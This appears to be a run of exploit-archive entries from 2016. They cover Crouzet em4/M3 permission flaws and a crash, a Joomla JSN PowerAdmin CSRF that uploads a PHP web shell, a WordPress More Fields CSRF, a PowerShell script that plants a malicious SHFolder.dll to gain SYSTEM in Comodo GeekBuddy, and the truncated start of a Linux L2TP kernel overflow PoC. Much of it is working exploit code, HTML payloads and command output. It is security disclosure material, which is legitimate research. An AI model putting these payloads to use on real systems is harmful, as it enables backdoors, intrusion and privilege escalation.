Desc: em4 soft and M3 soft suffers from an elevation of privileges
vulnerability which can be used by a simple authenticated user that can
change the executable file with a binary of choice. The vulnerability
exist due to the improper permissions, with the 'C' flag (Change) for
'Everyone' group.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5310
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5310.php
25.01.2016
--
C:\Program Files (x86)\Crouzet automation>cacls "em4 soft"
C:\Program Files (x86)\Crouzet automation\em4 soft Everyone:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\Crouzet automation>cd "em4 soft"
C:\Program Files (x86)\Crouzet automation\em4 soft>cacls *.exe
C:\Program Files (x86)\Crouzet automation\em4 soft\em4 soft.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet automation\em4 soft\unins000.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet automation\em4 soft>
================================================================================================
C:\Program Files (x86)\Crouzet Automatismes>cacls "Millenium 3"
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3 Everyone:(OI)(CI)C
NT SERVICE\TrustedInstaller:(ID)F
NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F
NT AUTHORITY\SYSTEM:(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(ID)R
BUILTIN\Users:(OI)(CI)(IO)(ID)(special access:)
GENERIC_READ
GENERIC_EXECUTE
CREATOR OWNER:(OI)(CI)(IO)(ID)F
C:\Program Files (x86)\Crouzet Automatismes>cd "Millenium 3"
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3>cacls *.exe
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3\M3 soft.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3\unins000.exe Everyone:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
C:\Program Files (x86)\Crouzet Automatismes\Millenium 3>
Crouzet em4 soft 1.1.04 Integer Division By Zero
Vendor: Crouzet Automatismes SAS
Product web page: http://www.crouzet-automation.com
Affected version: 1.1.04 and 1.1.03.01
Summary: em4 is more than just a nano-PLC. It is a leading
edge device supported by best-in-class tools that enables
you to create and implement the smartest automation applications.
Desc: em4 soft suffers from a division by zero attack when handling
Crouzet Logic Software Document '.pm4' files, resulting in denial
of service vulnerability and possibly loss of data.
---------------------------------------------------------------------
(187c.1534): Integer divide-by-zero - code c0000094 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image013b0000
*** ERROR: Module load completed but symbols could not be loaded for image013b0000
eax=00000000 ebx=00000000 ecx=55c37c10 edx=00000000 esi=0105b13c edi=0110bb18
eip=013ea575 esp=0064d8b8 ebp=0064d8f4 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
image013b0000+0x3a575:
013ea575 f7bf18010000 idiv eax,dword ptr [edi+118h] ds:002b:0110bc30=00000000
0:000> u
image013b0000+0x3a575:
013ea575 f7bf18010000 idiv eax,dword ptr [edi+118h]
013ea57b 8d4de0 lea ecx,[ebp-20h]
013ea57e c745fc00000000 mov dword ptr [ebp-4],0
013ea585 50 push eax
013ea586 6808505b01 push offset image013b0000+0x205008 (015b5008)
013ea58b 51 push ecx
013ea58c ff15b0575a01 call dword ptr [image013b0000+0x1f57b0 (015a57b0)]
013ea592 8b870c010000 mov eax,dword ptr [edi+10Ch]
---------------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5309
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5309.php
25.01.2016
--
PoC:
http://zeroscience.mk/codes/poc5309.pm4.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39509.zip
---------------------------------------------------------
RatioSec Research Security Advisory RS-2016-001
---------------------------------------------------------
JSN PowerAdmin Joomla! Extension Remote Command Execution Via CSRF and
XSS vulnerabilities
---------------------------------------------------------
Product: JSN PowerAdmin Joomla! Extension
Vendor: JoomlaShine.com
Tested Versions: 2.3.0
Other Vulnerable Versions: Prior versions may also be affected
Vendor Notification: 28th January, 2016
Advisory Publication: 24th February, 2016
CVE Reference: Pending
RatioSec Advisory Reference: RS-2016-001
Risk Level: High
CVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
---------------------------------------------------------
RatioSec Research has discovered two cross-site request forgery and
reflected cross-site scripting vulnerabilities in JSN PowerAdmin
Joomla! Extension which can be exploited, respectively, to upload PHP
files and run arbitrary HTML and script code in a user's browser
session in context of the affected web site.
1) The application allows users to perform certain actions via HTTP
requests without performing proper checks to verify the requests
validity. An authenticated user's browser can be forced to upload PHP
files via the extension installer and subsequently execute arbitrary
commands with the web server privileges by tricking the user into
visiting a malicious web site.
2) Input passed to `identified_name` GET parameter when `package` is
set, `option` is set to `com_poweradmin`, `view` is set to
`installer`, and `task` is set to `installer.install` in
`/administrator/index.php` is not properly sanitised before being
reflected. This can be exploited to run arbitrary HTML and script code
in a user's browser session in context of the affected web site.
---------------------------------------------------------
Proof of Concept
Read the advisory details on the RatioSec Research website for the
proof of concept code.
http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/
----------------------------------------------------------
Solution
No official solution is currently available.
----------------------------------------------------------
Timeline
- First contact: 27th January, 2016
- Disclosure: 28th January, 2016. Preliminary date set to 10th, February 2016.
- E-mail notice after no response: 02nd February, 2016
- Advisory Publication: 24th February, 2016
----------------------------------------------------------
Advisory URL
http://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/
RatioSec Research
Mail: research at ratiosec dot com
Web: http://www.ratiosec.com/
Twitter: https://twitter.com/ratio_sec
----------------
Proof Of Concept
1) The following HTML page exploits the cross-site request forgery vulnerability and uploads a malicious PHP script system($_GET['cmd']); as /tmp/bd.phtml if visited by a logged-in administrator.
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/no8/joomla/administrator/index.php?option=com_poweradmin&view=installer&task=installer.install", true);
xhr.setRequestHeader("Accept", "*/*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------167969427914885435381146171168");
xhr.withCredentials = true;
var body = "-----------------------------167969427914885435381146171168\r\n" +
"Content-Disposition: form-data; name=\"package\"; filename=\"bd.phtml\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3cscript language=\"php\"\x3esystem($_GET['cmd']);\r\n" +
"\r\n" +
"-----------------------------167969427914885435381146171168--\r\n" +
"\r\n" +
"\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
The file extension .phtml and the <script language="php"> </script> tags are used here to fool the Joomla API JFile::upload() file validation checks. As result, the backdoor is installed permanently as /tmp/bd.phtml which can be used lately by the attacker to obtain the full system compromise.
Command Execution
2) The following URL exploits the cross-site scripting vulnerability to execute javascript code in a logged-in administrator’s browser.
http://localhost/joomla/administrator/index.php?package=foobar&option=com_poweradmin&view=installer&task=installer.install&identified_name=<img+src%3dx+onerror=alert("RatioSecResearch")>
# Exploit Title: Wordpress More Fields Plugin 2.1 Cross-Site Request Forgery
# Date: 28-02-2016
# Software Link: https://wordpress.org/support/plugin/more-fields
# Exploit Author: Aatif Shahdad
# Twitter: https://twitter.com/61617469665f736
# Contact: aatif_shahdad@icloud.com
# Category: webapps
1. Description
The plugin More Fields has CSRF token validation disabled for all functions, including the add box and delete box options. As a result, a specially crafted attacker page could cause
a logged-in administrator to add and delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
2. Proof of Concept
Login as admin to the wp-admin area at http://example.com/wp-admin. Open the following Proof-Of-Concept with the browser that you used to log in.
POC to add box named ‘test’:
--POC begins--
Add Boxes:
<html>
<body>
<form action="https://example.com/wpadmin/optionsgeneral.php?page=more-
fields&action=save&keys=_plugin%2C57UPhPh&navigation=boxes" method="POST">
<input type="hidden" name="label" value="test" />
<input type="hidden" name="post_types[]" value="press" />
<input type="hidden" name="position" value="left" />
<input type="hidden" name="fields" value="" />
<input type="hidden" name="ancestor_key" value="" />
<input type="hidden" name="originating_keys" value="_plugin,57UPhPh" />
<input type="hidden" name="action" value="save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Remove Boxes needs the following simple GET request (Assuming the name of the Box we want to delete is ‘test’):
<html>
<body>
<form action="https://example.com/wpadmin/optionsgeneral.php">
<input type="hidden" name="page" value="more-fields" />
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="action_keys" value="_plugin,test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Note: I have removed the CSRF tokens from the requests as they are redundant and not validated.
--End of POC--
3. Impact
The attacker can add/delete any number of extra fields in any number of additional boxes on the Write/Edit page in the Admin.
4. Solution:
Add in CSRF token validation to the plugin or switch to a different plugin. The development of the Plugin has ceased so this happens to be the latest version which can’t be upgraded as of now.
<#
````......````
``,;''''''''''''''''';,`
.;''''''''''''''''''''''''''',`
`:''''''''+';:,.``````.,:;'''''''''':`
,;'''''';,.` ``,;'''''';:
`:'''''',. `,'''''';.
`;+''+':` ,; `,''''';.
`;'''';. `` .:;'` `. `;'''''.
` :+''';` `,``:+'' ';;'`,''; `` `` :'''';`
.'''';` ,';' '':'` ';,'`'',' :''' .''` :'''',
`;''''` ;'' :+.` ;';, ';:' ''''`,;:+ '', `;''''`
.''''. ;:`, .'.':`'''.:;`;. +;:' '::; ;''' '; .'''',
:''';` ` '''',`':'' ..;:`','` '''' ':;;`'`';`':` :; :''';
;''+, .;`.'.'' ';.'`';': ,:. ` ` ` `,: .';',,'`;'.`';': .+'''`
`''''` ;'; ''.'.,','` ,` ``;`'' .`;'`''+: ;'''`
`'''' ., .'' ,'.'' ;;. ```````` `. ``'::'`;; ` :'''.
``''': `+,` .':`'',' `,;''''''''''+'':.` ;'.+:;'``': .'''.
`''', '', ''`:; `:'''''''''''''''''''''';. `;'`': ''`'` .''',
`''', ` `''` `'; .''''''''''''''''''''''''''''';` `.;' ;'.''`.: `''',
`''', :''.`'' ` ,;'''''''''''''''''''''''''''''''';. ` `,.'::', ''` .'''.
''', '.''`,': ,'''''''''''''''''''''''''''''''''''''', ` .+,'; ''; .'''`
''': ''`'' ;. `'''''''''''''''''';:::;';'''''''''''''''''. ;' :': ,,` .'''
:''; `''.'` ` :''''''''''''';:::.', `''';`:;'+'''','''''+; `,'; :''' ,'''
.''' `` .++; `''''''''''''`. `': '''; `:''' :'''''''. .+ :''.+. :'':
`''+ :'': `` ,''''''''''''' `': '''; `: ,'''''''': .`''.'' ` '''`
;''. `+.',; ;'''':''''''''; ` ', .'''': ` :''''';'''; `'.',`,', `+''
,'': '';,'. ;''''':''''''''`+` ;..`;'+''. '.:''''';'''''```.+' +:'` .'';
`''' `;``+',;.` ;''''':''''''''.'; `;'', '` '' ;''''','''''` ;,+.+. ;''.
;'+. :'': ;': ;'''''':''''':',''. `'';.+' '` ,'; .'''';''''''` `+.':` `'''
`'': .+`;''` ` ;'''''':''''''.::''. .''. :: `'';`,'''':''''''` :+'. ,'',
'''` :''.:'' :''''''':'''''; :'''' .'', `.,; :+'`''': ;''',''''''' ,` '''
.'': `'';`` ,''''''':;''''':`''';', ,''+` ,+':' +'''''''`,'''''''''''; .+` .'':
''' `''. :', `''''''':`'''''+.;';.:::::::,,''';`'': . .'''''''; ''''.''''''', ` ;'': '''
.'', ','';`. '''''''; :'''''' `,;'''''''''.``` . ''''';:,`:;''+`'''',,'''''''` :'';` `+':
'''` ''.,'; ;''''''; ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :''''''' '''. ;''
`'': .'';:; `'''''''` .+'', ,''''''''''''; '''''''++`''''':..:'''' `''''' ;'''''', ., `` .'',
` :'' :''` ''''''+` ;''``;'''''''''''''':``,,.`````,'''''. ';.;'''` `'''''''` .++. '';
+'' ,'''''': ;+`,'''''''''''''''''+''';;;;'''''''+` :;+,`''. `.''''''; .+'''` :'+`
,''. ': +'''''; ,,;''''''''''''''''''''''''''''''''''. `.::,` `';.', ;''''''` :'': `. `'';
;'' :;.;': ,''''''. `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;, `''''''; `.; .;'+` ;''
'': ` ;';';' ''''''; ''';;''''''',`.'',` .:;;''''''''''.,'''''''''''.;;. ,'''''' `;''''. .''`
.''. .';`;' .''''''. :+;;''''''''''': ;' ::::...;''+'':,'''';..``;''';. ''''''; `:''.`': `'':
:'' ` ,'` ;''''''. :;'''''''''''''';`;, `,''';` .:;;;'''': ,'''''' .,''', '''
;'; ''';,` `''''''''''` :''''''''''';.:'''`';:` ,''';`;''''''''''', ''''''. ;';,` :''`
`'', .;,'''; ,'''''''''' ;'''''''''':` :'''`::` ``'''',+''''''''''''+` ;'''''; .``.:;` `''.
.''` `+;'`;` '''''''''';.'''''''',` ''';` :''';'''';::;'''''';; ` `''''''` ;'';;; `+':
:'' ..;'' `''''''''''`'''''''', .'''` `+''';''. ,'''''''''''''''''''''''''''''''''''''':`
;'' :. `` .'''''''''';'''''''' ;''; ;''':::` :'''''''''''''''''''''''''''''''''''''''',
;': '''':` :'''''''''''''''''',` .''' ''''. `+'''''''''''''''''''''''''''''''''''''''''
'', :,;'': ;''''''''''''''''''` ;''... :''''` :''''''''''''''''''''''''''''''''''''''''''`
`''. `+'':,` ''''''''''''''''''; ,'';.+` . ,;''' `'''''''''''''''''''''''''''''''''''''''''';
.''. `.,;'; '''''''''';''''''', ''',+. `` .' .''' ''''''''+'''''''''''''''''''''''''''''''''',
.'+` ;''''' `` '''''''` `;''''.'++','`+.''' ''''''; `;+''''''
,'' ''''';; ,'''';'''';'``.''' :''''''` .'''''':
:'+ '''''': .'''';'''';'` .''' ,''''''` ,''''';
:'' ,''''', ''''''` .'''';'''';', .'''` .''''''` ''''''
;'' `''''''; :''''', '''''' .'''';'''';':,''''. .''''''` ''''''
;'' `';''''' :''''', :''''; :''''''''';''.''''' `''''''` ;'''''
;'' :''''', ,''''' `+''''''''':''.'''''` ,'''''; ''''''
:'+ ,''''', `'''''. ,'''''''''':''::''''; ;''''': `''''''
:'' ```. ,''''': ''''': `''''''''''',''+`'''''. `''''''. :''''''
,''` `''''''' .'''''; `''''': '''''''''''';''',,''''', ''''''' ,'''''',
.''` `''':,.; `'''''' `'''''': '''''''''''''';'''`'''''':. `,''''''', .''''''''
`''` `,;;;''` '''''' `'','''';,` `,''''''''''''''',''':.''''''''''''''''''':` ;'''''''''''''''''''''''''''''',
'', `+';;, '''''' `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+ '''''''''''''''''''''''''''''';
'': ` `,. ;'''''. `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;; `''''''''''''''''''''''''''';';
;'; ,''''; :''''': `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,', ,'''''''''''''''''''''''''''';
;'' ';;,.. .'''''' `''';; :''''''''''''''''';'''''''. '''''`;'''''''''''';+'` ;'''''''''''''''''''''''''';.
:'' `,:;''' ''''''` `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+: '''''''';''''''''';''''';,`
.''. .''',` ;''''': ` ''':;''. ````` :+'''''',;''''''', '''''';..;''''''''''` `'''''' `,'': `+':
'': ` .;. ,'''''+ .'';,'''''''';:''''''''','''''''': ;'''''''''.`,''''''' ;'''''; ,'', .''.
''; :+.++` `''''''. +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''', ''''''. ':''', :''`
:'' ,';:.'. ;'''''' ''''.:''''''''''''''''';;'''''''''''.'''. `:;'''''':'': :'''''' ';,.:' '''
.''. .;:''' .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''', '''''': ,'''', `'':
''; ;';, ;` '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';' ,. .;: ,''`
;'' `;', `,'''''''''''''.,'''''''''''''';','''';:.`` `,.;'''''''''''.+''''''.''''''; ,'+'. '''
.''. '''';` ''''';''''''';`'''''''''''''':.'';:,;'''':` ,:`:''''''''','',`:''':''''''` '.:''' `'':
''' :'': `:. ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.''''''; `'''..' :''
:''` `,. ;:++` ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+'''''' ;. ,+''` '';
`'': `'',`;: `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,' ,'',
;''` `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;'''''''' +.''+; '''
`'': ;'';` ` ''''''':''''';`'''''''', '''''''''''''''.,''''`''''',:''''`,'''''''` '''.:'; .'':
''+` ,` ,+: `'''''','''''':`'''''''` :'''''''''''''; ;'''`+''''`;'''':+''''''.` ` :'':;, '''
.'': ;';''. .'''''';'''''',`'''''+ ''''''''''''''` .,'';.''''' '''''''''''': +'``;'; .'',
''+` :''; ,'` :''''','''''''.,''''' ,'''''''''''''' :''''';''''','''';''''''; ,.''. .`` '''
`';; `+. ;'':' :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.'''''' :';`''; :''.
:'',` `'':.''` ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;'''''' ` :''.'''` `'''
''' ;'.:''` ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''` .''``'+',: '''`
.';; `;;'; ` :''''':'''''';'''`'';''''''''''': ,''''''''''`''';'''''; .,''` :` ,'':
;'', `', `'. ,''''';''''';'''''':''''''''''': .''''''''',`+';,''''; ``.'''; ``'''
'''` `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'', ,'`:'''''` '''`
.''' ;'.'' `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',` `;''''''';. ;'',
,''; ''.;', ,';''''';,''''''`+,` .;:;''',,'';'''+.;''''',```:+,''''''''''.:'';
;''; ''';', '. `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''
''': .,,': :': +''''''',''';.:'+,.` `.:''':`''''''''''; `'':'''''''''''''',`
''': ` .'' `'`;'''''''..,.:+,` ``.,.` ,'''`;'''''''+.';'.:'''':;'''''+:.'`
''': ;:`+'` ,:..,''''''; .+: `:'+''''';` ;'; .''''': `:';:+''';`''''''. .':
`'''; ; ;'. .';'`;'''',;'. .+''''''''''` ;;'+:'''; .+'''''''';''''''.;,'';
`'''' ,'; :'`'`;'''':+` `'''''''''''': ;'';'''`;''''''''''''''''',.''';
`'''' ` ` `':. ';''.+. `''''''''''''; `'''''::'''.'''',`'''''': :';;''
''''. :;,'`:'.';', '''''''''''': ,'''','''..''': '''';;:,''. `''
:''': `.+'' '''',' :''''''''''+. ''''''':`'''' .''';:;`.'.:' ';
,''''` `,` ',;:'. `;;;,``'''::::;''; :';, ,'''''' ;'''` +'''.''+'.:'+`':
`'''': ` ;'':' '''''+;.; `` ,:`''''', `'''''`,'''' :'''.''''..''','.
:''''. .,': :'''''''.`;'''';` .''''''` '''':`+'''``''',;'''``''';:'.
`'''''` `.'` ''''''';`'''''''': ,'''''; ;'''`''''; ''';:'''. ;''',''
,'''''` `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.:
:''''', .' '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '.
`:+'''';..; '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+
`,''''':' ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:
.;+':' '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' +
.:+` '''''''`''''''+'''+.'''''; .' ;''' ;''.;,'' ' ''.:``:
'. :'''''':.+'''''''',;''''', ;: ;''; '''.'.,;,,:'' '`'
;; `'''''''``;'''''',`,''''' `'` ''',.''',.:;`' ''.,.`;
.+ ''''''' ` `.,,.`'; '''; :; `''+`;'';;: :.;`',`; ;`
+: `'''''``';;;;;'''', `` `+. `''' '''::;;:;`;'`;..,
,' ``.. `+''''''''''+` :' `'';`''':. ,.',''.; '
`+' :'''''''''''', `+.` '',.''',. :,''''+ ;
.', ;''''''''''''. ': ''.,''':` ;.''''.,.
:'. :''''''''''', ;'` ''.:''',':;.''':.:
''. ,:''''',` ;+` :'.:'''' ':`''; ;
`'', ''. ::,''''``; :, '
;+;` .'+` ``'':'`,; '``
,'';. `.'';` :';'.,; '.
`,''';:::::;'''. ``+;' +`
`,:''''';,` ,,;
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
###Technical Geeky Stuff###
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
The directory listing is as follows:
10/06/2015 12:08 AM <DIR> .
10/06/2015 12:08 AM <DIR> ..
10/02/2015 10:43 PM 27 download.cfg
10/02/2015 10:47 PM 637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015 10:44 PM 2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015 10:44 PM 547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015 12:07 AM 1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015 10:44 PM 554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015 12:06 AM 950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015 12:08 AM 563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015 10:43 PM 768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015 12:08 AM 581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015 10:47 PM 459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015 10:46 PM 1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015 12:07 AM 1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015 12:07 AM 648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015 10:43 PM 1 survey_version.txt
10/06/2015 12:05 AM <DIR> updates
The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access. This allows
non-administrator users the ability to create files in the directory but not delete or modify
existing files.
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
in the C:\Program Files (x86)\Common Files\COMODO\ folder. This service is auto launched by the
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM
level privielges. This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe
to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.
During client connections to update servers and Geek Buddy executions the unit.exe binary will
launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe. This setup binary has
hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is
executed from.
.data:00409240 dd offset aShfolder ; "SHFOLDER"
.data:00409244 dd offset aShgetfolderpat ; "SHGetFolderPathA"
During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before
looking in the other PATHS variables.
By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an
update or client connection to secure servers (which occurs automatically at user login) a user can
elevate their privileges to SYSTEM and compromise the system fully.
######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times. C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do. #Ninja
Sizzop - for fixing my greetz
#########################################################################################################
#>
Param
(
[Parameter(ValueFromPipelineByPropertyName = $true)]
[string]$DLL = ""
)
if (!(Test-Path $DLL))
{
throw "Fatal Error: The specified file: $DLL does not exist."
}
Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info"
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
$objNotifyIcon.Visible = $True
$objNotifyIcon.ShowBalloonTip(8000)
/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=735
In certain kernel versions it is possible to use the AIO subsystem (io_submit syscall) to pass size values larger than MAX_RW_COUNT to the networking subsystem's sendmsg implementation. In the L2TP PPP sendmsg implementation, a large size parameter can lead to an integer overflow and kernel heap corruption during socket buffer allocation. This could be exploited to allow local privilege escalation from an unprivileged user account.
This issue affects 64-bit systems running older branches of the Linux kernel, such as version 3.10 and 3.18. More recent major versions aren't affected due to refactoring in the AIO subsystem. The attached proof-of-concept trigger has been tested on a fully updated Ubuntu 14.04 LTS server. This issue is also likely to affect 64-bit Android devices, which typically use branches of 3.10.
The first observation is that an IOCB_CMD_PWRITE of a large length (such as 0xffffffff) will correctly bound the request iocb's ki_nbytes value to MAX_RW_COUNT. However, in the single vector case, if the relevant access_ok check passes in aio_setup_single_vector then the iov length will still be large (0xffffffff). On 64-bit systems it is possible for access_ok(type, user_ptr, 0xffffffff) to succeed.
The second observation is that sock_aio_write does not use the iocb for the sendmsg size calculation, but instead takes the summation of all input iov lengths. Thus calling io_submit with an IOCB_CMD_PWRITE operation on a socket will result in a potentially large value being passed to sendmsg.
The third observation is that AF_PPPOX sockets using the PX_PROTO_OL2TP protocol has a sendmsg implementation that does not bounds check the incoming length parameter (called total_len) before using the value to calculate the length of a socket buffer allocation (using sock_wmalloc).
The fourth observation is that the underlying socket buffer allocation routine __alloc_skb uses an "unsigned int" for it's size parameter rather than a size_t, and that this value can wrap to a small positive value upon alignment calculations and internal space overhead calculations. This results in a small value being passed to kmalloc for the socket buffer data allocation. Then, the size is recalculated using SKB_WITH_OVERHEAD, which effectively re-underflows the size calculation to a small negative value (large unsigned value). The newly created socket buffer has a small backing data buffer and a large size.
The proof-of-concept trigger crashes when writing the skb_shared_info structure into the end of the socket buffer, which is out-of-bounds. Other corruption may also be possible in pppol2tp_sendmsg/l2tp_xmit_skb/ip_output.
*/
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
